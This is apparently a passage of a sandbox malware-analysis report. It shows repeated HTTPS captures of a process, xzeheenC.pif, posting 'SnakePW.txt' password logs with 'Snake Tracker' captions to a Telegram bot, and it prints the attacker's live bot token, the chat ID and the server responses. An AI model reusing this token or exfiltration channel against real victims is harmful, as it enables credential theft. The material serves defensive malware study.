                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:36 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.549847149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1fab8db33d56
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 61 62 38 64 62 33 33 64 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1fab8db33d56Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:36 UTC370INHTTP/1.1 429 Too Many Requests
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 111
                                                                                                                      Connection: close
                                                                                                                      Retry-After: 10
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:36 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.549848149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f7c87e875f8
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 63 38 37 65 38 37 35 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f7c87e875f8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:36 UTC370INHTTP/1.1 429 Too Many Requests
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 111
                                                                                                                      Connection: close
                                                                                                                      Retry-After: 10
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:36 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.549854149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2056f7803414
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 35 36 66 37 38 30 33 34 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2056f7803414Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:49 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:49 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 517
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:49 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418836,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      16192.168.2.549856149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f9415ada89a
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 39 34 31 35 61 64 61 38 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f9415ada89aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:49 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:49 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:49 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418838,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      17192.168.2.549857149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1fc2f018f4d8
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 63 32 66 30 31 38 66 34 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1fc2f018f4d8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:49 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:49 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:49 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 36 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418839,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535069,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.549888149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20e90cf9d34f
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 65 39 30 63 66 39 64 33 34 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20e90cf9d34fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:51 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418843,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      19192.168.2.549889149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2032ce18b5a9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:50 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 33 32 63 65 31 38 62 35 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2032ce18b5a9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:51 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:51 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:51 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 37 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418841,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535071,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.549890149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:50 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2056fe5a93ed
                                                                                                                      Host: api.telegram.org
